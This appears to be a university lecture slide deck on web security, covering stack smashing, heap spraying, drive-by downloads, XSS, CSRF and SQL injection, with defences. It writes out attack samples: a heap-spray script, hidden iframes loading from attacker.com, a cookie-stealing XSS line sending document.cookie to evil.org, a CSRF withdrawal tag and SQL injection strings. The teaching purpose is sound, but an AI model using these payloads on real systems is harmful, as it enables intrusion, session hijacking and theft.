1

Web Security

Dr. 許 富 皓Department of Computer Science and Information Engineering,

National Central University

2

Stack Smashing Attacks

3

Principle of Stack Smashing Attacks Overwritten control transfer structures, such

as return addresses or function pointers, to redirect program execution flow to desired code.

Attack strings carry both code and address(es) of the code entry point.

4

A Linux Process Layout and Stack Operations

kernel address space

Libraries

heap

BSS

data

code

high address

low address

stack

main()

{ :

G(1);

}

void G(int a)

{

:

H(3);

}

void H(int c)

{

:

}

env, argv, argc

EIP

main

G

H

5

Explanation of BOAs (1)

b

return address add_g

address of G’s

frame point

C[0]

H’s stack

frame

G(int a)

{

H(3);

add_g:

}

H( int b)

{ char c[100];

int i=0;

while((c[i++]=getch())!=EOF)

{

}

}

C[99]

Input String: abc

c

b

a

G’s stack frame

0xabc

0xaba0xabb

i

ebp

esp

6

Explanation of BOAs (2)

b

return address add_g

address of G’s

frame point

C[0]

H’s stack

frame

addrress oxabc

G(int a)

{

H(3);

add_g:

}

H( int b)

{ char c[100];

int i=0;

while((c[i++]=getch())!=EOF)

{

}

}

C[99]

Injected Code0xabc

Attack String: xxInjected Codexy0xabc

Length=108 bytes

0xaba0xabb x

x

x

y

i

X : 1 byte

y : 4 bytes

ebp

esp

7

Injected Code: The attacked programs usually have root

privilege; therefore, the injected code is executed with root privilege.

The injected code is already in machine instruction form; therefore, a CPU can directly execute it. However the above fact also means that the injected

code must match the CPU type of the attacked host.

Usually the injected code will fork a shell; hence, after an attack, an attacker could have a root shell.

8

Heap Spray and Drive-by Download

9

Heap Spray[Wikipedia][Nozzle]

Heap spraying is a technique used in exploits to facilitate arbitrary code execution.

Heap spraying is a security threat using a strategy of allocating many objects containing the attacker’s exploit code in an application’s heap.

Heap spraying requires that an attacker use another memory corruption exploit to trigger an attack, but the act of spraying greatly simplifies the attack and increases its likelihood of success.

10

Heap Spray Overview [Puttaraksa]

11

Implementation - JavaScript

Heap sprays for web browsers are commonly implemented in JavaScript andspray the heap by

making copies of a long string and storing these strings in an array, up to the point

where enough memory has been sprayed to cover the area that the exploit targets.

P.S.: The long string begins with a NOP sled and ends with shellcode.

12

Implementation - ActionScript

ActionScript In July 2009, exploits were found to be using

ActionScript to spray the heap in Adobe Flash.

13

Implementation - Images

ImagesThough it has been proven that heap-spraying

can be done through other means, for instance by loading image files into the process, this has not seen widespread use (as of August 2008).

Memory Corruption Exploit

14

15

Sources of Memory Corruption Exploit Mishandling Tag Attribute Values Virtual Table …

16

Mishandling Tag Attribute Values (1)

HTTP MS IE Malf. IFRAME/EMBED BO [Symantec] It is reported that an attacker can exploit this condition

by creating a malicious Web page containing a malformed IFRAME, FRAME or EMBED tag.

Specifically, the attacker creates the IFRAME, FRAME or EMBED tag by specifying large string values for the 'SRC' and 'NAME' properties.

These values are copied into finite sized process buffers resulting in memory corruption.

17

Mishandling Tag Attribute Values (2)[Julam]

<IFRAME SRC=file://BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

::

BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

NAME=“CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC:

CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC”></IFRAME>

Result: eip stops at address 0x769f682f

18

Mishandling Tag Attribute Values (3)[Julam]

memory = new Array();

for (i=0;i<700;i++)

memory[i] = block + shellcode;

19

Virtual Table [Foster et al.]

The virtual table is a lookup table of functions used to resolve function calls in a dynamic/late binding manner.

Class objects and structures are often stored on the heap.

One field of a class object is a pointer to its virtual table, called virtual-function table pointer.

20

Virtual Table [Foster et al.] – Overview

*__vptr

char a[100]

*__vptr

char a[100]

21

Virtual Table [Ratanaworabhan et al.] – Spraying the Heap <SCRIPT language="text/javascript"> shellcode = unescape("%u4343%u4343%..."); oneblock = unescape("%u0D0D%u0D0D");

var fullblock = oneblock; while (fullblock.length<0x40000) { fullblock += fullblock; }

sprayContainer = new Array(); for (i=0; i<1000; i++) { sprayContainer[i] = fullblock + shellcode; } </SCRIPT>

NOP Sled

Shell Code

22

Result

Because the size of the sprayed heap area may be tens of MBs, ASLR may not work as expected.

23

Drive-by Download Attacks [wikipedia]

Download of spyware, a computer virus, or any kind of malware that happens without knowledge of the user.

Drive-by downloads may happen byvisiting a websiteviewing an e-mail message or by clicking on a deceptive popup window.

24

Clicking on a Deceptive Popup Window For instance, a user clicks on the window in the

mistaken belief that it is an error report from his own PC or that it is an innocuous advertisement popup.

In such cases, the "supplier" may claim that the user "consented" to the download though he was completely unaware of having initiated a malicious software download.

25

Drive-by Downloads using Web Pages Features:

1. Same appearance as the original webpage

2. Secret downloads

3. Automatic installation

4. Based on vulnerabilities of browsers, plug-ins, or OSes

26

Good web serverGood web serverVulnerable browserVulnerable browser

<iframe src=“http://attacker.com/bad.htm” height=0 width=0></iframe>

<script src=http://attacker.com/bad.js></script>

<iframe src=“http://attacker.com/bad.htm” height=0 width=0></iframe>

<script src=http://attacker.com/bad.js></script>

Malicious web serverMalicious web server

attacker.combad.htm

Client side WWW

27

Good web serverGood web serverVulnerable browserVulnerable browser

Malicious web serverMalicious web server

attacker.com

bad.htm

attacker2.com

document.write(unescape("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%69%66%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%5C%78%36%44%5C%78%37%33%5C%78% ………

document.write(unescape("%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%0D%0A%69%66%28%6E%61%76%69%67%61%74%6F%72%2E%75%73%65%72%41%67%65%6E%74%2E%74%6F%4C%6F%77%65%72%43%61%73%65%28%29%2E%69%6E%64%65%78%4F%66%28%22%5C%78%36%44%5C%78%37%33%5C%78% ………

Client side WWW

28

Discuss

Why not inject shell code at the first stage? (i.e. inject shell code to the “good web server” directly)

29

Drive-by Downloads

Why Drive-by-Downloads?Deploy malware on computers of victimsLarge scale (vs. target attacks)Bypass firewalls or NAT protection

Current solutionsStatic web-page analysisWeb-sites reputationMicrosoft Killbit

30

HTTP Cookie [Wikipedia]

31

HTTP Cookies HTTP cookies, sometimes known as web cookies or

just cookies, are parcels of text sent by a server to a web browser and then sent back unchanged by the browser each time it

accesses that server HTTP cookies are used for

authenticating tracking maintaining specific information about users, such as

site preferences the contents of their electronic shopping carts.

The term "cookie" is derived from "magic cookie," a well-known concept in Unix computing which inspired both the idea and the name of HTTP cookies.

32

Cookie Delivery

33

Examine the Cookies

Most browsers supporting JavaScript allow the user to see the cookies that are active with respect to a given page by typing javascript:alert("Cookies: "+document.cookie) in the browser URL field.

Some browsers incorporate a cookie manager for the user to see and selectively delete the cookies currently stored in the browser.

34

Third-party Cookies

While cookies are only sent to the server setting them

orone in the same Internet domain,

a Web page may contain images or other components stored on servers in other domains.

Cookies that are set during retrieval of these components are called third-party cookies.

35

Using Third-party Cookies to Track a User’s Activity

Advertising companies use third-party cookies to track a user across multiple sites.

In particular, an advertising company can track a user across all pages where it has placed advertising images or Web bugs.

Knowledge of the pages visited by a user allows the advertisement company to target advertisement to the user's presumed preferences.

36

Tracking Example

37

Privacy Threat

The possibility of building a profile of users has been considered by some a potential privacy threat, even when the tracking is done on a single

domain but especially when tracking is done across

multiple domains using third-party cookies. For the above reason, some countries have

legislation about cookies.

38

Cross-site Scripting

Categories

Non-persistent  XSS (Reflected XSS) the most common type nowadays

Persistent XSS

39

40

Non-persistent XSS

41

Through Hyperlinks An attacker may be able to embed their malicious code within a hyperlink to

the target site. When the client web browser follows the link, the URL sent to trusted.org includes malicious code. The site (trusted.org) sends a page back to the browser including the value of criteria without validating user supplied input , which consequently forces the execution of code from the evil attackers’ server. For example; <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT

SRC='http://evil.org/badkama.js'></SCRIPT>"> Go to trusted.org </A>

In the attack above, one source is inserting code into pages sent by another source.

It should be noted that this attack: • disguises the link as a link to http://trusted.org, • can be easily included in an HTML email message, • does not supply the malicious code inline, but is downloaded from

http://evil.org. Thus the attacker retains control of the script and can update or remove the exploit code at anytime.

Web browser

trusted.org

42

Ways to Deploy Hyperlinks

The user will most likely click on this link from another website, instant message,

or simply just reading a web board or email

message.

43

Non-persistent Cross Site Scripting (XSS) A non-persistent cross-site scripting (XSS)

vulnerability is caused by the failure of an web based application to validate user supplied input before returning it to the client system.

By causing the victim’s browser to execute injected code under the same permissions as the web application domain, an attacker can bypass the traditional Document Object Model (DOM) security restrictions which can result in cookie theft, account hijacking, changing of web application account settings, spreading of a webmail virus, etc.

44

The Most Common Victims to Non-persistent XSS

The most common web components that fall victim to XSS vulnerabilities include CGI scripts, search engines, interactive bulletin boards, and custom error pages with poorly written input validation

routines. Additionally, a victim doesn’t necessarily have to click

on a link; XSS code can also be made to load automatically in an HTML e-mail with certain manipulations of the IMG or IFRAME HTML tags.

Each of these

components could

generate a web page.

45

Hijack Web Application Sessions

The most popular XSS attack (and devastating) is the harvesting ofauthentication cookies

andsession management tokens.

With this information, it is often a trivial exercise for an attacker to hijack the victims active session, completely bypassing the authentication process.

46

Traditional Non-persistent XSS Web Application Hijack Scenario (1)

1. The attacker investigates an interesting site• that normal users must authenticate to gain access to and• that tracks the authenticated user through the use of

cookies or session ID’s

2. The attacker finds a XSS vulnerable page on the site, for instance http://trusted.org/account.asp.

3. Using a little social engineering, • the attacker creates a special link to the site and• embeds it in an HTML email that he sends to a long list of

potential victims.

47

Traditional Non-persistent XSS Web Application Hijack Scenario (2)4. Embedded within the special link are some coding

elements specially designed to transmit a copy of the victims cookie back to the attacker. For instance: <img src="http://trusted.org/account.asp?ak=<script>document.location.replace('http://evil.org/steal.cgi?'+document.cookie); </script>">

5. Unknown to the victim, the attacker has now received a copy of their cookie information.

The attacker now visits the web site and, by substituting his cookie information with that of the victims, is now perceived to be the victim by the server application.

48

Traditional Non-persistent XSS Web Application Hijack Steps [David Endler]

49

SOLUTIONS AND WORKAROUNDS [David Endler]

50

For Users

As a web application user, there are a few ways to protect yourself from XSS attacks. The first and most effective solution is to

disable all scripting language support in your browser and email reader.

If this is not a feasible option for business reasons, another recommendation is to use reasonable caution when clicking links in anonymous e-mails and dubious web pages.

51

Web Application Developers and Vendors

Web application developers and vendors should ensure that all user input is parsed and filtered properly. User input includes

things stored in GET Query strings, POST data, Cookies, URLs, and in general any persistent data that is transmitted

between the browser and web server.

52

User Input Filtering The best philosophy to follow regarding user

input filtering is to deny all but a pre-selected element set of benign characters in the web input stream. This prevents developers from having to constantly

predict and update all forms of malicious input in order to deny only specific characters (such as < ; ? etc.).

Some decent guidelines for input filtering can be found in the OWASP Requirements document “OWASP Guide to Building Secure Web Applications and Web Services".

53

Test

Once an application has evolved out of the design and development phases, it is important to periodically test for XSS vulnerabilities since application functionality is constantly changing due to upgrades integration of third party technologiesdecentralized website authoring

54

Vulnerability Web Application Scanners Many web application vulnerability scanners

start to include checks for XSS. The OWASP Testing group plans to produce a

methodology for checking XSS on a web application.

Web Scarab

55

Examples Used to Bypass Being Detected XSS Cheat Sheet

56

XSS Tool

XSS-Proxy

57

Cross-site Request

Forgery[Wikipedia]

58

Definition

Cross-site request forgery, also known as one-click attack or session riding and abbreviated as CSRF ("sea-surf") or XSRF, is a type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts.

59

Background

CSRF vulnerabilities have been known and in some cases exploited since the 1990s.

Because it is carried out from the user's IP address, CSRF is untraceable without proper logging.

60

Impact

As of 2007 there are few well-documented examples.

About 18 million users of eBay's Internet Auction Co. at Auction.co.kr in Korea lost personal information in February 2008.

Customers of a bank in Mexico were attacked in early 2008 with an image tag in email.

61

Example One user, Bob, might be browsing a chat forum where

another user, Mallory, has posted a message. Suppose that Mallory has crafted an HTML image element

that references a script on Bob's bank's website (rather than an image file), e.g.,

<img src="http://bank.example/withdraw?account=bob&amount=1000000&for=mallory">

If Bob's bank keeps his authentication information in a cookie

and if the cookie hasn't expired, then the attempt by Bob's browser to load the image will

submit the withdrawal form with his cookie, thus authorizing a transaction without Bob's approval.

62

Common CSRF Characteristics

Involve sites that rely on a user's identity Exploit the site's trust in that identity Trick the user's browser into sending

HTTP requests to a target site Involve HTTP requests that have side

effects

63

Common CSRF Victims

At risk are web applications that perform actions based on input from trusted and authenticated users without requiring the user to authorize the specific action.

A user that is authenticated by a cookie saved in his web browser could unknowingly send an HTTP request to a site that trusts him and thereby cause an unwanted action.

64

Common CSRF Pitfalls

CSRF attacks using images are often made from Internet forums, where users are allowed to post images but not JavaScript.

65

CSRF Assumptions

This attack relies on a few assumptions: The attacker has knowledge of sites on which the

victim has current authentication (more common on web forums, where this attack is most common)

The attacker's "target site" has authentication cookies, or the victim has a current session cookie with the target site

The "target site" doesn't have secondary authentication for actions (such as form tokens)

66

Example Assume a script in the document at http://store.company.com/dir/other.html executes the following statement:

document.domain = "company.com"; After that statement executes, the page would

pass the origin check with http://company.com/dir/page.html.

However, by the same reasoning, company.com could not set document.domain to othercompany.com.

67

Prevention

For the web site, switching from a persistent authentication method (e.g. a cookie or HTTP authentication) to a transient authentication method (e.g. a hidden field provided on every form) will help prevent these attacks.

hidden field of a form

A similar approach is to include a secret, user-specific token in forms that is verified in addition to the cookie.

a field of a form filled out by a user

68

SQL Injection [SK]

69

What is SQL Injection?

Many web pages take parameters from web users, and make SQL query to the database. Take for instance when a user login a web page, the

web page accepts that user name and password and makes SQL query to the database to check if the user has valid name and password.

With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

70

SQL Injection Attack Channels SQL injection is one type of web hacking

that require nothing but port 80 and it might just work even if the admin is patch-happy.

It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.

71

What You Should Look for? Try to look for pages that allow you to submit data, i.e:

login page, search page, feedback, etc.

Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:

<FORM action=Search/search.asp method=post><input type=hidden name=A value=C></FORM>

Everything between the <FORM> and </FORM> has potential parameters that might be useful (exploit wise).

72

What If You Can't Find Any Page That Takes Input? You should look for pages like ASP, JSP, CGI, or PHP web pages.

Try to look especially for URL that takes parameters, like:

http://duck/index.asp?id=10

73

How Do You Test If It Is Vulnerable? Start with a single quote trick. Input something like:hi' or 1=1--

into login, or password, or even in the URL. Example:  - Login: hi' or 1=1-- - Pass: hi' or 1=1-- - http://duck/index.asp?id=hi' or 1=1—

If luck is on your side, you will get login without any login name or password.

74

Hidden Field

If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly.

Example:

<FORM action=http://duck/Search/search.asp method=post><input type=hidden name=A value="hi' or 1=1--"></FORM>

75

Database Table Example[CQU]

76

Database Table productPName PCategory price number bar code

bread food 30 100 100-234-7

cake food 300 20 100-987-6

cookie food 50 70 100-812-9

model car

toy 200 20 300-567-7

figure toy 300 80 300-987-9

paper stationery 0.5 5000 981-897-7

pen stationery 20 300 981-967-0

77

Web Application Input and Its Corresponding SQL Query

Take an asp page that will link you to another page with the following URL:

http://duck/index.asp?category=food

In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code:

v_cat = request("category")sqlstr="SELECT * FROM product

WHERE PCategory='" & v_cat & "'"set rs=conn.execute(sqlstr)

As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:

SELECT * FROM product WHERE PCategory='food'

The query should return a result set containing one or more rows that match the WHERE condition, in this case, 'food'.

78

Why ' or 1=1-- ? Now, assume that we change the URL into something like this:

http://duck/index.asp?category=food' or 1=1--

Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:

SELECT * FROM product WHERE PCategory='food' or 1=1--'

The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query,

which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".

79

Other Crafted Input (1)

However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

' or 'a'='a

The SQL query will now become:

SELECT * FROM product WHERE PCategory='food' or 'a'='a'

It should return the same result.

80

Other Crafted Input (2)

Depending on the actual SQL query, you may have to try some of these possibilities:

' or 1=1--" or 1=1--or 1=1--' or 'a'='a" or "a"="a') or ('a'='a